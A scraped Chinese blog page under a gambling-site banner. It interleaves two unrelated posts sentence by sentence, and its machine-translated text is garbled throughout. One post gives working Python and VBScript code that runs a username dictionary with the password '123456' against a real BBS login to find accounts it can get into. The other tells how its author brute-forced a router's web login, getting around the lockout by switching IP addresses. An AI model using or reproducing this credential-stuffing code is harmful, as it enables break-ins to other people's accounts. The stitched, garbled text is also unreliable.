菜单

使用PythonInfiniti爆破路由器密码, 限制错误次数? 对Python无用!

2019年4月5日 - Java

manbetx网页手机登录版 1

难道真的要自己破解二个么?算了,正好试试小编的Python水平。
python版

image

复制代码 代码如下:

在庭院里面看到了一个没人用的路由器(ws860s),看起来像个黑科学技术的玩意儿,就想着进去看看,到底有哪些好玩的。看到前面包车型大巴价签上有web界面的地方,然后登陆进去看看,发现有密码,然后自身想,路由器的密码应该都以足以reset的,然后笔者就用笔戳那个reset键,神跡未有爆发,原来这些reset键坏了。

#coding: gbk
import httplib, urllib

manbetx网页手机登录版 2

def Check(username, password):
params = urllib.urlencode(
{‘userid’: username, ‘passwd’: password})
headers = {“Content-type”:
“application/x-www-form-urlencoded”}
conn = httplib.HTTPSConnection(“www.bdwm.net”)
manbetx网页手机登录版,conn.request(“POST”,
“/bbs/bbslog2.php”, params, headers)
res = conn.getresponse().read()
conn.close()
if res.find(“密码不正确”) != -1:
return False
elif res.find(“不存在那几个用户”) != -1:
return False
else:
return True

image

for i in open(“English.Dic”):
if Check(i.rstrip(),”123456″):
print i

manbetx网页手机登录版 3

附带也写了个VBS版的,感觉相似VBS比较快,感觉出题目了?

image

复制代码 代码如下:

剖析进程

Dim fso
Set fso = CreateObject(“scripting.filesystemobject”)
With fso.OpenTextFile(“English.Dic”,1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,”123456″) Then
WScript.Echo id & vbTab &”OK”
End If
Loop
End With

抓包

Function Check(username,password)
Dim http
Set http = CreateObject(“Msxml2.XMLHTTP”)
http.open _
“POST”,”https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
“Content-Type”,”application/x-www-form-urlencoded”
http.send “userid=” & username & “&passwd=” & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,”密码不正确”) Then
Check = False
ElseIf InStr(response,”不存在那些用户”) Then
Check = False
Else
Check = True
End If
End Function

1、打开路由的web页面:1玖贰.16捌.3.一,路由器再次回到

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject(“adodb.stream”)
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = “gb2312”
AnsiToUnicode = ado.ReadText
End Function

manbetx网页手机登录版 4

事实申明,12345陆真是一个精锐的密码。但愿上午尚未警察二叔敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

image

http://www.bkjia.com/Pythonjc/306570.htmlwww.bkjia.comtruehttp://www.bkjia.com/Pythonjc/306570.htmlTechArticle难道真的要我破解一个么?算了,正好试试我的Python水平。
python版 复制代码 代码如下: #coding: gbk import httplib, urllib def
Check(username, password)…

manbetx网页手机登录版 5

image

会获得csrf和cookie和所须求的值,那么些值都要保存下来,前面会用。

2、输入用户名密码后:

manbetx网页手机登录版 6

image

manbetx网页手机登录版 7

image

manbetx网页手机登录版 8

image

manbetx网页手机登录版 9

image

叁、路由器重临数据

manbetx网页手机登录版 10

image

密码的转变方法

从地点抓包的结果来看,Password字段是通过加密的,所以尽管大家要Python暴力破解,须求把这么些password的变更算法找出来。

开拓web登录页面,查看源代码,找找算法

manbetx网页手机登录版 11

image

manbetx网页手机登录版 12

image

manbetx网页手机登录版 13

image

manbetx网页手机登录版 14

image

manbetx网页手机登录版 15

image

在linux上改动ip地址,很简短一条命令就能够缓解:

manbetx网页手机登录版 16

image

[password:bbbbbbbb];{“errorCategory”:”user_pass_err”,”csrf_param”:”FcnG919l8J7XhQsOYQEMS3WhsC2liSX”,”count”:2,”csrf_token”:”IQ/LfSZSx7gTp6VflYnZelobNSpoMy2″}

ip地址被限定,必要等待一分钟的晋升:

[password:aaaaaaaa];{“errorCategory”:”Three_time_err”,”csrf_param”:”VKGTylVILQA9SFsTyYdpkHv8qfJPIIw”,”count”:3,”csrf_token”:”MTQLBcWQN+1DJjAP+A6xC4AUSXciBod”}

报到成功的唤醒:

****[password:xxxxxxxx];{“csrf_param”:”H/DyWxogz7+2y4UfzhqddowkjH1uL04″,”csrf_token”:”MorgBb0+PNpoE8KhwBwq4OoioD2NcCs”,”errorCategory”:”ok”,”level”:2,”IsWizard”:true,”IsFirst”:true}

流程

manbetx网页手机登录版 17

image

具备的数量都准备好了,下一步,正是始于采用Python写程序了。

核心Python代码:

manbetx网页手机登录版 18

image

manbetx网页手机登录版 19

image

manbetx网页手机登录版 20

image

manbetx网页手机登录版 21

image

manbetx网页手机登录版 22

image

manbetx网页手机登录版 23

image

manbetx网页手机登录版 24

image

manbetx网页手机登录版 25

image

manbetx网页手机登录版 26

image

manbetx网页手机登录版 27

image

manbetx网页手机登录版 28

image

manbetx网页手机登录版 29

image

manbetx网页手机登录版 30

image

manbetx网页手机登录版 31

image

manbetx网页手机登录版 32

image

怎么防患暴力破解?

manbetx网页手机登录版 33

image

manbetx网页手机登录版 34

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图